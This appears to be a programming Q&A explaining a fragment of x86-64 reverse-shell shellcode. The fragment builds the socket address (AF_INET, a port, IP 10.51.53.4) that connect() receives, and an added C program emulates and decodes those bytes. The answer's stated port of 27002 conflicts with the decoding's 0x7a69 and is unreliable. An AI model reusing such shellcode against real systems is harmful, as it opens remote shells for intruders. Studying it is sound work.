Reputation: 16837
I am looking at a reverse shell shellcode from this link. I am not able to follow the reason for the following instructions in the shellcode:
4000a3: 4d 31 d2                   xor    r10,r10
4000a6: 41 52                      push   r10
4000a8: c6 04 24 02                mov    BYTE PTR [rsp],0x2
4000ac: 66 c7 44 24 02 7a 69       mov    WORD PTR [rsp+0x2],0x697a
4000b3: c7 44 24 04 0a 33 35 04    mov    DWORD PTR [rsp+0x4],0x435330a
4000bb: 48 89 e6                   mov    rsi,rsp
I searched other SO questions, and I found that BYTE/WORD/DWORD PTR would be used to assign a byte/word/dword. Since this is x86-64, I'm assuming WORD here means 2 bytes and DWORD means 4 bytes (please correct me if I'm wrong). The author is pushing zero on the stack. Then he has 3 mov instructions. Assume RSP initially points to:
x00 x00 x00 x00 x00 x00 x00 x00
1) Is the following the effect of the three mov instructions (assuming little endian)?
x04 x35 x33 x0a x7a x69 x00 x02
2) If yes, then what is the author achieving by it, because aren't the next mov instructions overwriting what's pointed to by rsp?
Thanks
Upvotes: 0
Views: 401
Reputation: 1102
1) Yes
2) The author is saving the sockaddr for the socket connect syscall:
int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
In x86-64, the arguments are passed in the registers rdi, rsi and rdx. So he is moving the addr pointer into the rsi register.
mov BYTE PTR [rsp],0x2            ; Address family (PF_INET)
mov WORD PTR [rsp+0x2],0x697a     ; port = 27002
mov DWORD PTR [rsp+0x4],0x435330a ; addr = 10.51.53.4 (0a333504)
Upvotes: 1
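To make the two questions concrete, here is an added C program (not part of the question or the answer above; the function and struct names are my own). It assumes a Linux x86-64 host, so memory is little-endian and struct sockaddr_in has sin_family at offset 0, sin_port at offset 2 and sin_addr at offset 4. It emulates the push and the three stores from the listing into an 8-byte slot, prints the resulting bytes in address order, and then reads the slot back as the leading fields of struct sockaddr_in, the same view connect() gets through the pointer left in rsi. The immediates, address and port bytes are taken from the listing.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Decoded view of the 8 bytes the shellcode builds at [rsp]. */
struct endpoint {
    uint16_t family;              /* sin_family, host byte order */
    uint16_t port;                /* sin_port after ntohs() */
    char     ip[INET_ADDRSTRLEN]; /* sin_addr as a dotted quad */
};

/* Emulate "push r10" (r10 == 0) plus the three stores from the listing.
 * memcpy of a uint16_t/uint32_t on a little-endian host lays the bytes out
 * exactly as "mov WORD PTR" / "mov DWORD PTR" do on x86-64. */
void emulate_stores(uint8_t slot[8])
{
    uint8_t  b = 0x02;        /* mov BYTE PTR  [rsp],0x2           */
    uint16_t w = 0x697a;      /* mov WORD PTR  [rsp+0x2],0x697a    */
    uint32_t d = 0x0435330a;  /* mov DWORD PTR [rsp+0x4],0x435330a */

    memset(slot, 0, 8);       /* push r10: eight zero bytes at [rsp] */
    memcpy(slot + 0, &b, sizeof b);
    memcpy(slot + 2, &w, sizeof w);
    memcpy(slot + 4, &d, sizeof d);
}

/* Reinterpret the slot as the first 8 bytes of struct sockaddr_in (assumed
 * Linux layout: sin_family @0, sin_port @2, sin_addr @4). sin_port and
 * sin_addr are stored in network byte order, hence ntohs() and inet_ntop(). */
struct endpoint decode_sockaddr(const uint8_t slot[8])
{
    struct sockaddr_in sa;
    struct endpoint ep;

    memset(&sa, 0, sizeof sa);
    memcpy(&sa, slot, 8);
    ep.family = sa.sin_family;
    ep.port   = ntohs(sa.sin_port);
    if (inet_ntop(AF_INET, &sa.sin_addr, ep.ip, sizeof ep.ip) == NULL)
        ep.ip[0] = '\0';
    return ep;
}

/* One byte of the emulated slot, for checking the little-endian layout. */
uint8_t stored_byte(int offset)
{
    uint8_t slot[8];
    if (offset < 0 || offset > 7)
        return 0;
    emulate_stores(slot);
    return slot[offset];
}

/* Whole pipeline: build the slot as the shellcode does, then decode it. */
struct endpoint decode_shellcode_sockaddr(void)
{
    uint8_t slot[8];
    emulate_stores(slot);
    return decode_sockaddr(slot);
}

/* Compare the decoded address with a dotted-quad string (1 = match). */
int decoded_ip_equals(const char *dotted)
{
    struct endpoint ep = decode_shellcode_sockaddr();
    return strcmp(ep.ip, dotted) == 0;
}

int main(void)
{
    uint8_t slot[8];
    emulate_stores(slot);
    printf("[rsp..rsp+7]:");
    for (int i = 0; i < 8; i++)
        printf(" %02x", slot[i]);
    printf("\n");

    struct endpoint ep = decode_sockaddr(slot);
    printf("sin_family=%u (AF_INET=%d) sin_port=%u sin_addr=%s\n",
           ep.family, AF_INET, ep.port, ep.ip);
    return 0;
}
```

In address order the slot comes out as 02 00 7a 69 0a 33 35 04: the three stores fill disjoint offsets (0, 2 and 4), so nothing is overwritten. sin_family reads as 2 (AF_INET). Both sin_port and sin_addr are kept in network byte order, so the bytes 7a 69 at rsp+2 go through ntohs() to give 0x7a69, which is the port the kernel will connect to, and 0a 33 35 04 at rsp+4 render as 10.51.53.4.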